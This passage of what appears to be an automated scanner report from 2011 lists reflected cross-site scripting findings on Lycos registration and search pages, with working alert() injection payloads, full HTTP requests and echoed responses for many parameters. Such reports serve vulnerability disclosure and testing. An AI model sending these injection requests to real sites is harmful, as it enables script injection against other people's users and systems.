HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:55:04 GMT Server: Set-Cookie: PENTA=173.193.214.243.1297090504967514; path=/; domain=.lycos.com X-Powered-By: PHP/5.1.6 Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:55:03 GMT Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:55:04 GMT; path=/; domain=lycos.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Content-Length: 5984 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LYCOS NETWORK: Registration Forgot Password</title>
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 2f10a><script>alert(1)</script>016b58e2edc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lostpassword.php/%22%20stYle2f10a><script>alert(1)</script>016b58e2edc=%22x:expre/**/ssion(alert(9)) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: registration.lycos.com Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:55:04 GMT Server: Set-Cookie: PENTA=173.193.214.243.1297090504527301; path=/; domain=.lycos.com X-Powered-By: PHP/5.1.6 Set-Cookie: isMobile=deleted; expires=Sun, 07-Feb-2010 14:55:03 GMT Set-Cookie: isMobile=mobile; expires=Mon, 07-Feb-2011 15:55:04 GMT; path=/; domain=lycos.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Content-Length: 5990 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LYCOS NETWORK: Registration Forgot Password</title>
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e81ba"%3balert(1)//af5066fd037 was submitted in the cat parameter. This input was echoed as e81ba";alert(1)//af5066fd037 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?tab=multi&cat=imagese81ba"%3balert(1)//af5066fd037 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:24 GMT; path=/ Set-Cookie: LYCOS_SEARCH=ddfqsr2hppq8qij9d4ieqghss2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17474
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_imagese81ba";alert(1)//af5066fd037"; //--> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b73"><script>alert(1)</script>052c690a4be was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?tab=multi&cat=images92b73"><script>alert(1)</script>052c690a4be HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:24 GMT; path=/ Set-Cookie: LYCOS_SEARCH=2hh4b57i87910i70ds7mfjm932; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_images92b73"><script>alert(1)</script>052c690a4be&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32777"><script>alert(1)</script>df0c8dd5168 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?tab=people&mobile=132777"><script>alert(1)</script>df0c8dd5168 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/ Set-Cookie: LYCOS_SEARCH=hjmhvrge1a613s8sqffiuss0k4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17234
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&mobile=132777"><script>alert(1)</script>df0c8dd5168&diktfc=6A6DBC228ADE4617A913BE636EF29CDEDBB6A4EBFE67&mobile=1"> ...[SNIP]...
1.287. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9be9"><script>alert(1)</script>3e6249bcdc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?e9be9"><script>alert(1)</script>3e6249bcdc4=1 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:12 GMT; path=/ Set-Cookie: LYCOS_SEARCH=ui1o7s14njsg0a3gcq4g4tjrk1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17190
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?e9be9"><script>alert(1)</script>3e6249bcdc4=1&diktfc=2B57C99267C3BB3AB84E408578CBAC3EF52B542AF4EE&mobile=1"> ...[SNIP]...
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75975"><script>alert(1)</script>6c6e640c41d was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?src=LYCOS50&query=75975"><script>alert(1)</script>6c6e640c41d HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:18 GMT; path=/ Set-Cookie: LYCOS_SEARCH=a7jqf2o9trkq33mjlrtdhcmgs1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PARTNER=lycos50 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?src=LYCOS50&query=75975"><script>alert(1)</script>6c6e640c41d&diktfc=A3B554BD102E2D83F1395F90E8ACDF586D8AACE8DC18&mobile=1"> ...[SNIP]...
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4774"><script>alert(1)</script>de363e9cc4d was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?src=LYCOS50f4774"><script>alert(1)</script>de363e9cc4d&query= HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:17 GMT; path=/ Set-Cookie: LYCOS_SEARCH=j2co10c00q05ao63t7a5jgm8e1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PARTNER=lycos50f4774%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ede363e9cc4d Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:24:16 GMT P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17596
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?src=LYCOS50f4774"><script>alert(1)</script>de363e9cc4d&query=&diktfc=761A6929C5442BEE59CAA6139134CCACAA19EB73D471&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c0d5"><script>alert(1)</script>7685ded7554 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?tab=web9c0d5"><script>alert(1)</script>7685ded7554 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:19 GMT; path=/ Set-Cookie: LYCOS_SEARCH=eace7dic8bq4v0e2qhi7rqe8v7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_web9c0d5"><script>alert(1)</script>7685ded7554&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43791"%3balert(1)//d9279e4be1f was submitted in the cat parameter. This input was echoed as 43791";alert(1)//d9279e4be1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /image/?tab=multi&cat=images43791"%3balert(1)//d9279e4be1f HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/ Set-Cookie: LYCOS_SEARCH=5m9teqd1e7d8kuou5aessesri1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17474
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_images43791";alert(1)//d9279e4be1f"; //--> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d400"><script>alert(1)</script>04436fbd937 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /image/?tab=multi&cat=images3d400"><script>alert(1)</script>04436fbd937 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:30 GMT; path=/ Set-Cookie: LYCOS_SEARCH=ldvud0eepml0vstmc33qlqegp2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_images3d400"><script>alert(1)</script>04436fbd937&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
1.293. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/image/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81b13"><script>alert(1)</script>4decd24c467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /image/?81b13"><script>alert(1)</script>4decd24c467=1 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:27 GMT; path=/ Set-Cookie: LYCOS_SEARCH=en9m4qp7l5qdk9naigf89kr9b3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17190
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?81b13"><script>alert(1)</script>4decd24c467=1&diktfc=7CBE54719741B0F72BA55F284533AF4F1E949604FE02&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 647e3"><script>alert(1)</script>8c865f2d222 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /image/?tab=multi647e3"><script>alert(1)</script>8c865f2d222&cat=images HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/ Set-Cookie: LYCOS_SEARCH=r3tgvh6jeasitmtraofqqkd521; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multi647e3"><script>alert(1)</script>8c865f2d222&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00d3"%3balert(1)//19c367855c0 was submitted in the cat parameter. This input was echoed as b00d3";alert(1)//19c367855c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/?tab=multi&cat=videob00d3"%3balert(1)//19c367855c0 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/ Set-Cookie: LYCOS_SEARCH=mv7t2v9cb7e6jmrr9uae88l2k1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_videob00d3";alert(1)//19c367855c0"; //--> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7022"><script>alert(1)</script>2066ac00765 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /video/?tab=multi&cat=videof7022"><script>alert(1)</script>2066ac00765 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/ Set-Cookie: LYCOS_SEARCH=5v26taejkg6hrvenn2penr4js5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_videof7022"><script>alert(1)</script>2066ac00765&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
1.297. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22399"><script>alert(1)</script>eb4d51ae47e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /video/?22399"><script>alert(1)</script>eb4d51ae47e=1 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:24:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/ Set-Cookie: LYCOS_SEARCH=d8jtk82lnbuvgpa2un328jp885; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17190
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?22399"><script>alert(1)</script>eb4d51ae47e=1&diktfc=CBA540D2A67B2A655A0D21D611F27D39EF126CA3CA03&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db38"><script>alert(1)</script>0bdbb3d2807 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /video/?tab=multi4db38"><script>alert(1)</script>0bdbb3d2807&cat=video HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
